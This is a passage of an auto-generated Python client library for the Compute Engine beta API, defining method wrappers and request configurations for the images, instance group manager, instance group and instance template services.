request_type_name=u'ComputeImagesGetRequest',
response_type_name=u'Image',
supports_download=False,
)
def GetFromFamily(self, request, global_params=None):
"""Returns the latest image that is part of an image family and is not deprecated.
Args:
request: (ComputeImagesGetFromFamilyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Image) The response message.
"""
config = self.GetMethodConfig('GetFromFamily')
return self._RunMethod(
config, request, global_params=global_params)
GetFromFamily.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.getFromFamily',
ordered_params=[u'project', u'family'],
path_params=[u'family', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/family/{family}',
request_field='',
request_type_name=u'ComputeImagesGetFromFamilyRequest',
response_type_name=u'Image',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an image in the specified project using the data included in the request.
Args:
request: (ComputeImagesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'forceCreate', u'requestId'],
relative_path=u'projects/{project}/global/images',
request_field=u'image',
request_type_name=u'ComputeImagesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of custom images available to the specified project. Custom images are images you create that belong to your project. This method does not get any images that belong to other projects, including publicly-available images, like Debian 8. If you want to get a list of publicly-available images, use this method to make a request to the respective image project, such as debian-cloud or windows-cloud.
Args:
request: (ComputeImagesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ImageList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/images',
request_field='',
request_type_name=u'ComputeImagesListRequest',
response_type_name=u'ImageList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an image. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeImagesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/images/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeImagesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeImagesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/images/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeImagesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class InstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the instanceGroupManagers resource."""
_NAME = u'instanceGroupManagers'
def __init__(self, client):
super(ComputeBeta.InstanceGroupManagersService, self).__init__(client)
self._upload_configs = {
}
def AbandonInstances(self, request, global_params=None):
"""Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersAbandonInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AbandonInstances')
return self._RunMethod(
config, request, global_params=global_params)
AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.abandonInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
request_field=u'instanceGroupManagersAbandonInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersAbandonInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of managed instance groups and groups them by zone.
Args:
request: (ComputeInstanceGroupManagersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagerAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersAggregatedListRequest',
response_type_name=u'InstanceGroupManagerAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified managed instance group and all of the instances in that group. Note that the instance group must not belong to a backend service. Read Deleting an instance group for more information.
Args:
request: (ComputeInstanceGroupManagersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceGroupManagers.delete',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
"""Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersDeleteInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteInstances')
return self._RunMethod(
config, request, global_params=global_params)
DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.deleteInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
request_field=u'instanceGroupManagersDeleteInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersDeleteInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns all of the details about the specified managed instance group. Gets a list of available managed instance groups by making a list() request.
Args:
request: (ComputeInstanceGroupManagersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManager) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.get',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersGetRequest',
response_type_name=u'InstanceGroupManager',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.
A managed instance group can have up to 1000 VM instances per group. Please contact Cloud Support if you need an increase in this limit.
Args:
request: (ComputeInstanceGroupManagersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
request_field=u'instanceGroupManager',
request_type_name=u'ComputeInstanceGroupManagersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of managed instance groups that are contained within the specified project and zone.
Args:
request: (ComputeInstanceGroupManagersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersListRequest',
response_type_name=u'InstanceGroupManagerList',
supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
"""Lists all of the instances in the managed instance group. Each instance in the list has a currentAction, which indicates the action that the managed instance group is performing on the instance. For example, if the group is still creating an instance, the currentAction is CREATING. If a previous action failed, the list displays the errors for that failed action.
Args:
request: (ComputeInstanceGroupManagersListManagedInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagersListManagedInstancesResponse) The response message.
"""
config = self.GetMethodConfig('ListManagedInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.listManagedInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersListManagedInstancesRequest',
response_type_name=u'InstanceGroupManagersListManagedInstancesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is patched even if the instances in the group are still in the process of being patched. You must separately verify the status of the individual instances with the listManagedInstances method. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeInstanceGroupManagersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.instanceGroupManagers.patch',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field=u'instanceGroupManagerResource',
request_type_name=u'ComputeInstanceGroupManagersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
"""Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersRecreateInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RecreateInstances')
return self._RunMethod(
config, request, global_params=global_params)
RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.recreateInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
request_field=u'instanceGroupManagersRecreateInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersRecreateInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the managed instance group. If you increase the size, the group creates new instances using the current instance template. If you decrease the size, the group deletes instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
Args:
request: (ComputeInstanceGroupManagersResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.resize',
ordered_params=[u'project', u'zone', u'instanceGroupManager', u'size'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId', u'size'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resize',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def ResizeAdvanced(self, request, global_params=None):
"""Resizes the managed instance group with advanced configuration options like disabling creation retries. This is an extended version of the resize method.
If you increase the size of the instance group, the group creates new instances using the current instance template. If you decrease the size, the group deletes instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating, creatingWithoutRetries, or deleting actions with the get or listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
Args:
request: (ComputeInstanceGroupManagersResizeAdvancedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('ResizeAdvanced')
return self._RunMethod(
config, request, global_params=global_params)
ResizeAdvanced.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.resizeAdvanced',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resizeAdvanced',
request_field=u'instanceGroupManagersResizeAdvancedRequest',
request_type_name=u'ComputeInstanceGroupManagersResizeAdvancedRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetAutoHealingPolicies(self, request, global_params=None):
"""Modifies the autohealing policies.
Args:
request: (ComputeInstanceGroupManagersSetAutoHealingPoliciesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetAutoHealingPolicies')
return self._RunMethod(
config, request, global_params=global_params)
SetAutoHealingPolicies.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.setAutoHealingPolicies',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setAutoHealingPolicies',
request_field=u'instanceGroupManagersSetAutoHealingRequest',
request_type_name=u'ComputeInstanceGroupManagersSetAutoHealingPoliciesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
"""Specifies the instance template to use when creating new instances in this group. The templates for existing instances in the group do not change unless you recreate them.
Args:
request: (ComputeInstanceGroupManagersSetInstanceTemplateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetInstanceTemplate')
return self._RunMethod(
config, request, global_params=global_params)
SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.setInstanceTemplate',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
request_field=u'instanceGroupManagersSetInstanceTemplateRequest',
request_type_name=u'ComputeInstanceGroupManagersSetInstanceTemplateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
"""Modifies the target pools to which all instances in this managed instance group are assigned. The target pools automatically apply to all of the instances in the managed instance group. This operation is marked DONE when you make the request even if the instances have not yet been added to their target pools. The change might take some time to apply to all of the instances in the group depending on the size of the group.
Args:
request: (ComputeInstanceGroupManagersSetTargetPoolsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTargetPools')
return self._RunMethod(
config, request, global_params=global_params)
SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.setTargetPools',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
request_field=u'instanceGroupManagersSetTargetPoolsRequest',
request_type_name=u'ComputeInstanceGroupManagersSetTargetPoolsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInstanceGroupManagersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInstanceGroupManagersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is updated even if the instances in the group have not yet been updated. You must separately verify the status of the individual instances with the listManagedInstances method.
Args:
request: (ComputeInstanceGroupManagersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.instanceGroupManagers.update',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field=u'instanceGroupManagerResource',
request_type_name=u'ComputeInstanceGroupManagersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class InstanceGroupsService(base_api.BaseApiService):
"""Service class for the instanceGroups resource."""
_NAME = u'instanceGroups'
def __init__(self, client):
super(ComputeBeta.InstanceGroupsService, self).__init__(client)
self._upload_configs = {
}
def AddInstances(self, request, global_params=None):
"""Adds a list of instances to the specified instance group. All of the instances in the instance group must be in the same network/subnetwork. Read Adding instances for more information.
Args:
request: (ComputeInstanceGroupsAddInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddInstances')
return self._RunMethod(
config, request, global_params=global_params)
AddInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.addInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/addInstances',
request_field=u'instanceGroupsAddInstancesRequest',
request_type_name=u'ComputeInstanceGroupsAddInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of instance groups and sorts them by zone.
Args:
request: (ComputeInstanceGroupsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instanceGroups',
request_field='',
request_type_name=u'ComputeInstanceGroupsAggregatedListRequest',
response_type_name=u'InstanceGroupAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified instance group. The instances in the group are not deleted. Note that instance group must not belong to a backend service. Read Deleting an instance group for more information.
Args:
request: (ComputeInstanceGroupsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceGroups.delete',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeInstanceGroupsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified instance group. Get a list of available instance groups by making a list() request.
Args:
request: (ComputeInstanceGroupsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroup) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.get',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeInstanceGroupsGetRequest',
response_type_name=u'InstanceGroup',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance group in the specified project using the parameters that are included in the request.
Args:
request: (ComputeInstanceGroupsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
request_field=u'instanceGroup',
request_type_name=u'ComputeInstanceGroupsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instance groups that are located in the specified project and zone.
Args:
request: (ComputeInstanceGroupsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
request_field='',
request_type_name=u'ComputeInstanceGroupsListRequest',
response_type_name=u'InstanceGroupList',
supports_download=False,
)
def ListInstances(self, request, global_params=None):
"""Lists the instances in the specified instance group.
Args:
request: (ComputeInstanceGroupsListInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupsListInstances) The response message.
"""
config = self.GetMethodConfig('ListInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.listInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/listInstances',
request_field=u'instanceGroupsListInstancesRequest',
request_type_name=u'ComputeInstanceGroupsListInstancesRequest',
response_type_name=u'InstanceGroupsListInstances',
supports_download=False,
)
def RemoveInstances(self, request, global_params=None):
"""Removes one or more instances from the specified instance group, but does not delete those instances.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration before the VM instance is removed or deleted.
Args:
request: (ComputeInstanceGroupsRemoveInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveInstances')
return self._RunMethod(
config, request, global_params=global_params)
RemoveInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.removeInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/removeInstances',
request_field=u'instanceGroupsRemoveInstancesRequest',
request_type_name=u'ComputeInstanceGroupsRemoveInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetNamedPorts(self, request, global_params=None):
"""Sets the named ports for the specified instance group.
Args:
request: (ComputeInstanceGroupsSetNamedPortsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetNamedPorts')
return self._RunMethod(
config, request, global_params=global_params)
SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.setNamedPorts',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/setNamedPorts',
request_field=u'instanceGroupsSetNamedPortsRequest',
request_type_name=u'ComputeInstanceGroupsSetNamedPortsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInstanceGroupsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInstanceGroupsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class InstanceTemplatesService(base_api.BaseApiService):
"""Service class for the instanceTemplates resource."""
_NAME = u'instanceTemplates'
def __init__(self, client):
super(ComputeBeta.InstanceTemplatesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified instance template. Deleting an instance template is permanent and cannot be undone. It's not possible to delete templates which are in use by an instance group.
Args:
request: (ComputeInstanceTemplatesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
